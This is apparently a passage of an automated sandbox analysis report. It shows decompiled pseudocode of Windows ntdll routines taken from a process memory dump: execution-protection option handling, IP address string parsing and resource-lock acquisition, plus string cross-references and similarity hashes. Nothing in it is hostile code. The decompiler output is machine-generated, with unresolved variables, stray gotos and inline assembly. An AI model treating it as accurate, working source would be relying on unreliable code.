                                                                                                                                                                					if(_t52 == 0) {
                                                                                                                                                                						E00B83F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                                                                                                						_t71 =  &_v540;
                                                                                                                                                                						_t56 = _t73 + _v544 - 0x218;
                                                                                                                                                                						_t77 = _t76 + 0x14;
                                                                                                                                                                						_v552 = _t56;
                                                                                                                                                                						__eflags = _t71 - _t56;
                                                                                                                                                                						if(_t71 >= _t56) {
                                                                                                                                                                							goto L1;
                                                                                                                                                                						} else {
                                                                                                                                                                							goto L10;
                                                                                                                                                                						}
                                                                                                                                                                						while(1) {
                                                                                                                                                                							L10:
                                                                                                                                                                							_t62 = E00B48375(_t71, 0x20);
                                                                                                                                                                							_pop(_t69);
                                                                                                                                                                							__eflags = _t62;
                                                                                                                                                                							if(__eflags != 0) {
                                                                                                                                                                								__eflags = 0;
                                                                                                                                                                								 *_t62 = 0;
                                                                                                                                                                							}
                                                                                                                                                                							E00B83F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                                                                                                							_t77 = _t77 + 0x10;
                                                                                                                                                                							E00BAE8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                                                                                                							__eflags = _t62;
                                                                                                                                                                							if(_t62 == 0) {
                                                                                                                                                                								goto L1;
                                                                                                                                                                							}
                                                                                                                                                                							_t31 = _t62 + 2; // 0x2
                                                                                                                                                                							_t71 = _t31;
                                                                                                                                                                							__eflags = _t71 - _v552;
                                                                                                                                                                							if(_t71 >= _v552) {
                                                                                                                                                                								goto L1;
                                                                                                                                                                							}
                                                                                                                                                                						}
                                                                                                                                                                					}
                                                                                                                                                                					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                                					_push(3);
                                                                                                                                                                					_push(0x55);
                                                                                                                                                                					E00B83F92();
                                                                                                                                                                					_t38 = 1;
                                                                                                                                                                					L2:
                                                                                                                                                                					return E00B3E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                                                                                                				}
                                                                                                                                                                				L1:
                                                                                                                                                                				_t38 = 0;
                                                                                                                                                                				goto L2;
                                                                                                                                                                			}




























                                                                                                                                                                APIs
                                                                                                                                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00B83F12
                                                                                                                                                                Strings
                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00B8E2FB
                                                                                                                                                                • Execute=1, xrefs: 00B83F5E
                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 00B8E345
                                                                                                                                                                • ExecuteOptions, xrefs: 00B83F04
                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00B83F75
                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00B83EC4
                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00B83F4A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BaseDataModuleQuery
                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                			E00B70B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                                				signed int _v8;
                                                                                                                                                                				signed int _v12;
                                                                                                                                                                				signed int _v16;
                                                                                                                                                                				signed int _v20;
                                                                                                                                                                				signed int _v24;
                                                                                                                                                                				signed int _v28;
                                                                                                                                                                				signed int _v32;
                                                                                                                                                                				void* _t108;
                                                                                                                                                                				void* _t116;
                                                                                                                                                                				char _t120;
                                                                                                                                                                				short _t121;
                                                                                                                                                                				void* _t128;
                                                                                                                                                                				intOrPtr* _t130;
                                                                                                                                                                				char _t132;
                                                                                                                                                                				short _t133;
                                                                                                                                                                				intOrPtr _t141;
                                                                                                                                                                				signed int _t156;
                                                                                                                                                                				signed int _t174;
                                                                                                                                                                				intOrPtr _t177;
                                                                                                                                                                				intOrPtr* _t179;
                                                                                                                                                                				intOrPtr _t180;
                                                                                                                                                                				void* _t183;
                                                                                                                                                                
                                                                                                                                                                				_t179 = _a4;
                                                                                                                                                                				_t141 =  *_t179;
                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                				_v28 = 0;
                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                				_v24 = 0;
                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                				_v32 = 0;
                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                				if(_t141 == 0) {
                                                                                                                                                                					L41:
                                                                                                                                                                					 *_a8 = _t179;
                                                                                                                                                                					_t180 = _v24;
                                                                                                                                                                					if(_t180 != 0) {
                                                                                                                                                                						if(_t180 != 3) {
                                                                                                                                                                							goto L6;
                                                                                                                                                                						}
                                                                                                                                                                						_v8 = _v8 + 1;
                                                                                                                                                                					}
                                                                                                                                                                					_t174 = _v32;
                                                                                                                                                                					if(_t174 == 0) {
                                                                                                                                                                						if(_v8 == 7) {
                                                                                                                                                                							goto L43;
                                                                                                                                                                						}
                                                                                                                                                                						goto L6;
                                                                                                                                                                					}
                                                                                                                                                                					L43:
                                                                                                                                                                					if(_v16 != 1) {
                                                                                                                                                                						if(_v16 != 2) {
                                                                                                                                                                							goto L6;
                                                                                                                                                                						}
                                                                                                                                                                						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                                						L47:
                                                                                                                                                                						if(_t174 != 0) {
                                                                                                                                                                							E00B48980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                                                                                                							_t116 = 8;
                                                                                                                                                                							E00B3DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                                                                                                						}
                                                                                                                                                                						return 0;
                                                                                                                                                                					}
                                                                                                                                                                					if(_t180 != 0) {
                                                                                                                                                                						if(_v12 > 3) {
                                                                                                                                                                							goto L6;
                                                                                                                                                                						}
                                                                                                                                                                						_t120 = E00B70CFA(_v28, 0, 0xa);
                                                                                                                                                                						_t183 = _t183 + 0xc;
                                                                                                                                                                						if(_t120 > 0xff) {
                                                                                                                                                                							goto L6;
                                                                                                                                                                						}
                                                                                                                                                                						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                                                                                                						goto L47;
                                                                                                                                                                					}
                                                                                                                                                                					if(_v12 > 4) {
                                                                                                                                                                						goto L6;
                                                                                                                                                                					}
                                                                                                                                                                					_t121 = E00B70CFA(_v28, _t180, 0x10);
                                                                                                                                                                					_t183 = _t183 + 0xc;
                                                                                                                                                                					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                                                                                                					goto L47;
                                                                                                                                                                				} else {
                                                                                                                                                                					while(1) {
                                                                                                                                                                						_t123 = _v16;
                                                                                                                                                                						if(_t123 == 0) {
                                                                                                                                                                							goto L7;
                                                                                                                                                                						}
                                                                                                                                                                						_t108 = _t123 - 1;
                                                                                                                                                                						if(_t108 != 0) {
                                                                                                                                                                							goto L1;
                                                                                                                                                                						}
                                                                                                                                                                						_t178 = _t141;
                                                                                                                                                                						if(E00B706BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                                                                                                							if(E00B706BA(_t135, _t178) == 0 || E00B70A5B(_t136, _t178) == 0) {
                                                                                                                                                                								if(_t141 != 0x3a) {
                                                                                                                                                                									if(_t141 == 0x2e) {
                                                                                                                                                                										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                                                                                                											goto L41;
                                                                                                                                                                										} else {
                                                                                                                                                                											_v24 = _v24 + 1;
                                                                                                                                                                											L27:
                                                                                                                                                                											_v16 = _v16 & 0x00000000;
                                                                                                                                                                											L28:
                                                                                                                                                                											if(_v28 == 0) {
                                                                                                                                                                												goto L20;
                                                                                                                                                                											}
                                                                                                                                                                											_t177 = _v24;
                                                                                                                                                                											if(_t177 != 0) {
                                                                                                                                                                												if(_v12 > 3) {
                                                                                                                                                                													L6:
                                                                                                                                                                													return 0xc000000d;
                                                                                                                                                                												}
                                                                                                                                                                												_t132 = E00B70CFA(_v28, 0, 0xa);
                                                                                                                                                                												_t183 = _t183 + 0xc;
                                                                                                                                                                												if(_t132 > 0xff) {
                                                                                                                                                                													goto L6;
                                                                                                                                                                												}
                                                                                                                                                                												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                                                                                                												goto L20;
                                                                                                                                                                											}
                                                                                                                                                                											if(_v12 > 4) {
                                                                                                                                                                												goto L6;
                                                                                                                                                                											}
                                                                                                                                                                											_t133 = E00B70CFA(_v28, 0, 0x10);
                                                                                                                                                                											_t183 = _t183 + 0xc;
                                                                                                                                                                											_v20 = _v20 + 1;
                                                                                                                                                                											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                                                                                                											goto L20;
                                                                                                                                                                										}
                                                                                                                                                                									}
                                                                                                                                                                									goto L41;
                                                                                                                                                                								}
                                                                                                                                                                								if(_v24 > 0 || _v8 > 6) {
                                                                                                                                                                									goto L41;
                                                                                                                                                                								} else {
                                                                                                                                                                									_t130 = _t179 + 1;
                                                                                                                                                                									if( *_t130 == _t141) {
                                                                                                                                                                										if(_v32 != 0) {
                                                                                                                                                                											goto L41;
                                                                                                                                                                										}
                                                                                                                                                                										_v32 = _v8 + 1;
                                                                                                                                                                										_t156 = 2;
                                                                                                                                                                										_v8 = _v8 + _t156;
                                                                                                                                                                										L34:
                                                                                                                                                                										_t179 = _t130;
                                                                                                                                                                										_v16 = _t156;
                                                                                                                                                                										goto L28;
                                                                                                                                                                									}
                                                                                                                                                                									_v8 = _v8 + 1;
                                                                                                                                                                									goto L27;
                                                                                                                                                                								}
                                                                                                                                                                							} else {
                                                                                                                                                                								_v12 = _v12 + 1;
                                                                                                                                                                								if(_v24 > 0) {
                                                                                                                                                                									goto L41;
                                                                                                                                                                								}
                                                                                                                                                                								_a7 = 1;
                                                                                                                                                                								goto L20;
                                                                                                                                                                							}
                                                                                                                                                                						} else {
                                                                                                                                                                							_v12 = _v12 + 1;
                                                                                                                                                                							L20:
                                                                                                                                                                							_t179 = _t179 + 1;
                                                                                                                                                                							_t141 =  *_t179;
                                                                                                                                                                							if(_t141 == 0) {
                                                                                                                                                                								goto L41;
                                                                                                                                                                							}
                                                                                                                                                                							continue;
                                                                                                                                                                						}
                                                                                                                                                                						L7:
                                                                                                                                                                						if(_t141 == 0x3a) {
                                                                                                                                                                							if(_v24 > 0 || _v8 > 0) {
                                                                                                                                                                								goto L41;
                                                                                                                                                                							} else {
                                                                                                                                                                								_t130 = _t179 + 1;
                                                                                                                                                                								if( *_t130 != _t141) {
                                                                                                                                                                									goto L41;
                                                                                                                                                                								}
                                                                                                                                                                								_v20 = _v20 + 1;
                                                                                                                                                                								_t156 = 2;
                                                                                                                                                                								_v32 = 1;
                                                                                                                                                                								_v8 = _t156;
                                                                                                                                                                								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                                								goto L34;
                                                                                                                                                                							}
                                                                                                                                                                						}
                                                                                                                                                                						L8:
                                                                                                                                                                						if(_v8 > 7) {
                                                                                                                                                                							goto L41;
                                                                                                                                                                						}
                                                                                                                                                                						_t142 = _t141;
                                                                                                                                                                						if(E00B706BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                                                                                                							if(E00B706BA(_t124, _t142) == 0 || E00B70A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                                                                                                								goto L41;
                                                                                                                                                                							} else {
                                                                                                                                                                								_t128 = 1;
                                                                                                                                                                								_a7 = 1;
                                                                                                                                                                								_v28 = _t179;
                                                                                                                                                                								_v16 = 1;
                                                                                                                                                                								_v12 = 1;
                                                                                                                                                                								L39:
                                                                                                                                                                								if(_v16 == _t128) {
                                                                                                                                                                									goto L20;
                                                                                                                                                                								}
                                                                                                                                                                								goto L28;
                                                                                                                                                                							}
                                                                                                                                                                						} else {
                                                                                                                                                                							_a7 = 0;
                                                                                                                                                                							_v28 = _t179;
                                                                                                                                                                							_v16 = 1;
                                                                                                                                                                							_v12 = 1;
                                                                                                                                                                							goto L20;
                                                                                                                                                                						}
                                                                                                                                                                					}
                                                                                                                                                                				}
                                                                                                                                                                				L1:
                                                                                                                                                                				_t123 = _t108 == 1;
                                                                                                                                                                				if(_t108 == 1) {
                                                                                                                                                                					goto L8;
                                                                                                                                                                				}
                                                                                                                                                                				_t128 = 1;
                                                                                                                                                                				goto L39;
                                                                                                                                                                			}

























                                                                                                                                                                0x00b70c26
                                                                                                                                                                0x00b70bcd
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70bcd
                                                                                                                                                                0x00b70b89
                                                                                                                                                                0x00b70b89
                                                                                                                                                                0x00b70b90
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70b96
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70b96
                                                                                                                                                                0x00b70a04
                                                                                                                                                                0x00b70a04
                                                                                                                                                                0x00b70b9a
                                                                                                                                                                0x00b70b9a
                                                                                                                                                                0x00b70b9b
                                                                                                                                                                0x00b70b9f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70ba5
                                                                                                                                                                0x00b70ac7
                                                                                                                                                                0x00b70aca
                                                                                                                                                                0x00b9eacf
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9eade
                                                                                                                                                                0x00b9eade
                                                                                                                                                                0x00b9eae3
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9eaf3
                                                                                                                                                                0x00b9eaf6
                                                                                                                                                                0x00b9eaf7
                                                                                                                                                                0x00b9eafe
                                                                                                                                                                0x00b9eb01
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9eb01
                                                                                                                                                                0x00b9eacf
                                                                                                                                                                0x00b70ad0
                                                                                                                                                                0x00b70ad4
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70ada
                                                                                                                                                                0x00b70ae6
                                                                                                                                                                0x00b70c34
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70c47
                                                                                                                                                                0x00b70c49
                                                                                                                                                                0x00b70c4a
                                                                                                                                                                0x00b70c4e
                                                                                                                                                                0x00b70c51
                                                                                                                                                                0x00b70c54
                                                                                                                                                                0x00b70c57
                                                                                                                                                                0x00b70c5a
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70c60
                                                                                                                                                                0x00b70afb
                                                                                                                                                                0x00b70afe
                                                                                                                                                                0x00b70b02
                                                                                                                                                                0x00b70b05
                                                                                                                                                                0x00b70b08
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b70b08
                                                                                                                                                                0x00b70ae6
                                                                                                                                                                0x00b70b44
                                                                                                                                                                0x00b709f8
                                                                                                                                                                0x00b709f8
                                                                                                                                                                0x00b709f9
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9eaa0
                                                                                                                                                                0x00000000

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __fassign
                                                                                                                                                                • String ID: .$:$:
                                                                                                                                                                • API String ID: 3965848254-2308638275
                                                                                                                                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                • Instruction ID: da35f7f8a8a1a3ae8596f3df710b46f6cfb8e3c43f9e11107d28c26d53edab49
                                                                                                                                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                • Instruction Fuzzy Hash: EAA18D7192030AEFCF25EF64C8856AEBBF4EB05304F24C5EBD46AA7242D6309A41DB51
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                			E00B70554(signed int _a4, char _a8) {
                                                                                                                                                                				void* __ebx;
                                                                                                                                                                				void* __edi;
                                                                                                                                                                				void* __esi;
                                                                                                                                                                				signed int* _t49;
                                                                                                                                                                				signed int _t51;
                                                                                                                                                                				signed int _t56;
                                                                                                                                                                				signed int _t58;
                                                                                                                                                                				signed int _t61;
                                                                                                                                                                				signed int _t63;
                                                                                                                                                                				void* _t66;
                                                                                                                                                                				intOrPtr _t67;
                                                                                                                                                                				void* _t69;
                                                                                                                                                                				signed int _t70;
                                                                                                                                                                				void* _t75;
                                                                                                                                                                				signed int _t81;
                                                                                                                                                                				signed int _t84;
                                                                                                                                                                				void* _t86;
                                                                                                                                                                				signed int _t93;
                                                                                                                                                                				signed int _t96;
                                                                                                                                                                				intOrPtr _t105;
                                                                                                                                                                				signed int _t107;
                                                                                                                                                                				void* _t110;
                                                                                                                                                                				signed int _t115;
                                                                                                                                                                				signed int* _t119;
                                                                                                                                                                				void* _t125;
                                                                                                                                                                				void* _t126;
                                                                                                                                                                				signed int _t128;
                                                                                                                                                                				signed int _t130;
                                                                                                                                                                				signed int _t138;
                                                                                                                                                                				signed int _t144;
                                                                                                                                                                				void* _t158;
                                                                                                                                                                				void* _t159;
                                                                                                                                                                				void* _t160;
                                                                                                                                                                
                                                                                                                                                                				_t96 = _a4;
                                                                                                                                                                				_t115 =  *(_t96 + 0x28);
                                                                                                                                                                				_push(_t138);
                                                                                                                                                                				if(_t115 < 0) {
                                                                                                                                                                					_t105 =  *[fs:0x18];
                                                                                                                                                                					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                                                                                                                					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                                                                                                						goto L6;
                                                                                                                                                                					} else {
                                                                                                                                                                						__eflags = _t115 | 0xffffffff;
                                                                                                                                                                						asm("lock xadd [eax], edx");
                                                                                                                                                                						return 1;
                                                                                                                                                                					}
                                                                                                                                                                				} else {
                                                                                                                                                                					L6:
                                                                                                                                                                					_push(_t128);
                                                                                                                                                                					while(1) {
                                                                                                                                                                						L7:
                                                                                                                                                                						__eflags = _t115;
                                                                                                                                                                						if(_t115 >= 0) {
                                                                                                                                                                							break;
                                                                                                                                                                						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00c101c0;
									_push(_t144);
									_push(0);
									_t51 = E00B2F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00B74FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00B83F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00B83F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00BB217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00B83F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00B73915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00c101c0;
												_push(_t138);
												_push(0);
												_t58 = E00B2F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00B74FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00B83F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00B83F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00BB217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00B83F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00B73915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00B55384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E00B2F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00B73915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E00B2F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00B73915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E00B2F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00B73915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00B55329(_t110, _t138);
																_t69 = E00B553A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
                                                                                                                                                                													__eflags = _t81;
                                                                                                                                                                													if(_t81 > 0) {
                                                                                                                                                                														continue;
                                                                                                                                                                													}
                                                                                                                                                                													break;
                                                                                                                                                                												}
                                                                                                                                                                												_t56 = _a4;
                                                                                                                                                                												__eflags = _t107;
                                                                                                                                                                											}
                                                                                                                                                                											if(__eflags != 0) {
                                                                                                                                                                												while(1) {
                                                                                                                                                                													L3:
                                                                                                                                                                													__eflags = _t56;
                                                                                                                                                                													if(_t56 != 0) {
                                                                                                                                                                														goto L32;
                                                                                                                                                                													}
                                                                                                                                                                													_t107 = _t107 | 0xffffffff;
                                                                                                                                                                													_t56 = 0;
                                                                                                                                                                													asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                													__eflags = 0;
                                                                                                                                                                													if(0 != 0) {
                                                                                                                                                                														continue;
                                                                                                                                                                													} else {
                                                                                                                                                                														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                                														return 1;
                                                                                                                                                                													}
                                                                                                                                                                													goto L59;
                                                                                                                                                                												}
                                                                                                                                                                												continue;
                                                                                                                                                                											} else {
                                                                                                                                                                												goto L40;
                                                                                                                                                                											}
                                                                                                                                                                										}
                                                                                                                                                                										goto L59;
                                                                                                                                                                									}
                                                                                                                                                                									__eflags = 0;
                                                                                                                                                                									return 0;
                                                                                                                                                                								} else {
                                                                                                                                                                									_t115 =  *(_t96 + 0x28);
                                                                                                                                                                									continue;
                                                                                                                                                                								}
                                                                                                                                                                							} else {
                                                                                                                                                                								_t106 =  *_t49;
                                                                                                                                                                								__eflags = _t106;
                                                                                                                                                                								if(__eflags > 0) {
                                                                                                                                                                									while(1) {
                                                                                                                                                                										_t93 = _t106;
                                                                                                                                                                										asm("lock cmpxchg [edi], esi");
                                                                                                                                                                										__eflags = _t93 - _t106;
                                                                                                                                                                										if(_t93 == _t106) {
                                                                                                                                                                											break;
                                                                                                                                                                										}
                                                                                                                                                                										_t106 = _t93;
                                                                                                                                                                										__eflags = _t93;
                                                                                                                                                                										if(_t93 > 0) {
                                                                                                                                                                											continue;
                                                                                                                                                                										}
                                                                                                                                                                										break;
                                                                                                                                                                									}
                                                                                                                                                                									__eflags = _t106;
                                                                                                                                                                								}
                                                                                                                                                                								if(__eflags != 0) {
                                                                                                                                                                									continue;
                                                                                                                                                                								} else {
                                                                                                                                                                									goto L23;
                                                                                                                                                                								}
                                                                                                                                                                							}
                                                                                                                                                                						}
                                                                                                                                                                						goto L59;
                                                                                                                                                                					}
                                                                                                                                                                					_t84 = _t115;
                                                                                                                                                                					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                                					__eflags = _t84 - _t115;
                                                                                                                                                                					if(_t84 != _t115) {
                                                                                                                                                                						_t115 = _t84;
                                                                                                                                                                						goto L7;
                                                                                                                                                                					} else {
                                                                                                                                                                						return 1;
                                                                                                                                                                					}
                                                                                                                                                                				}
                                                                                                                                                                				L59:
                                                                                                                                                                			}




































                                                                                                                                                                0x00b922e6
                                                                                                                                                                0x00b922e9
                                                                                                                                                                0x00b922f4
                                                                                                                                                                0x00b922f9
                                                                                                                                                                0x00b922fa
                                                                                                                                                                0x00b92305
                                                                                                                                                                0x00b92314
                                                                                                                                                                0x00b92319
                                                                                                                                                                0x00b9231a
                                                                                                                                                                0x00b9231d
                                                                                                                                                                0x00b92320
                                                                                                                                                                0x00b92323
                                                                                                                                                                0x00b92323
                                                                                                                                                                0x00b92328
                                                                                                                                                                0x00b9232d
                                                                                                                                                                0x00b9232f
                                                                                                                                                                0x00b92331
